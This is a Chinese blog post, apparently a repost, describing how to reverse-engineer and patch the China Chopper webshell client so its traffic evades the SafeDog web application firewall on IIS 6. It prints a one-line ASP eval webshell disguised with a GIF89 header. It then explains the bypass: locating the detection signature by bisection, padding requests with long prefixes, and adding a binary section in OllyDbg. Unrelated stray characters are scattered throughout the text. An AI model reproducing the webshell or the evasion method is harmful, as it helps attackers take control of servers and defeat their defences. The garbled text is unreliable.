首發(fā):逆向修改菜刀過安全狗
引子
文章是去年寫的楷拳,現在菜刀過狗也不是很難了趣斤,只是做一個逆向修改菜刀的演示俩块。
環(huán)境:Windows2003
中間件:iis6.0
安全狗版本:安全狗iis枸杞版3.5
菜刀:chopper.exe md5: e2caee9b7844ea06d964ad138d1da1f9
工具:吾愛破解專用版Ollydbg,LordPE浓领,C32ASM
嘗試
主要是為了繞過安全狗的一句話檢測玉凯,開啟這個就行了。
在IIS目錄放一句話木馬联贩。
GIF89
<%eval request("1")%>
最普通的那種漫仆,并沒有各種亂七八糟的變形之類的。
通過瀏覽器訪問泪幌。
正常的盲厌,并沒有被攔截。添加到菜刀列表祸泪,訪問試試看吗浩。
通過菜刀訪問,被安全狗攔截了没隘,打開fiddler看看封包懂扼。
分析修改
因為以前做過免殺,所以最早的時候沒有各種工具可以定位右蒲,我是通過OD的一半一半法來定位被查殺的位置阀湿。
AAAAAAAAAAAAAAABBAAAAAAAAAAAAAAA
我當時的想法是,能不能運用在過WAF上瑰妄,先把特征碼對半炕倘,然后慢慢對被檢測的補位進行定位。
去掉一般的封包重發(fā)翰撑,還是被攔截罩旋,看來特征在前半段。
已經沒有被攔截的提示眶诈,但是程序也是報錯了涨醋,畢竟代碼不完整,于是我想到了之前過安全狗的SQL注入是通過加很長很長的字符逝撬,然后就能繞過SQL注入檢測浴骂,那么如果我給這段封包加很長的字符是不是也可以繞過。
通過增加很長的前綴宪潮,就過掉了安全狗溯警,但是如果我每個封包都這樣攔截修改是不是太麻煩了趣苏。于是我想到了通過OD修改。
原版的菜刀并沒有加殼梯轻,可以直接修改食磕,打開OD查看下字符串。
這個位置是ASP的原版字符串喳挑,通過這里修改就可以修改他的發(fā)包彬伦,但是因為需要增加的長多比較大,所以原程序并沒有那么大的空地址段給我寫伊诵,要自己另外增加區(qū)段单绑。
上C32,新建一個文件曹宴,然后把前面的字符加進來搂橙。
區(qū)段做好了,然后用PEid把區(qū)段加到程序里笛坦。
然后通過OD修改区转,字符串偏移位置。
這里是004ab000
保存下文件弯屈,然后用fiddler抓包查看是否天然帶我們的字符串。
通過修改發(fā)包已經天然帶字符串恋拷,當然不止修改一個地方资厉,要完成ASP完成可用要修改好幾處位置。
總結
剛開始我認為這些waf是完美的蔬顾,后來我發(fā)現宴偿,這些防火墻有些類似于早點的殺毒軟件,通過特征庫來攔截诀豁,只要找對特征窄刘,就可以對癥下藥,不同品牌的防火墻規(guī)則不同舷胜,但是換湯不換藥基本都是這樣的套路娩践,兵來將敵水來土堰靠規(guī)則并不靠譜,修改web程序中的漏洞才是關鍵烹骨,過度依賴防火墻并不能很好的保護網站翻伺。
jsp與php 版過防火墻:PyCmd 加密隱形木馬
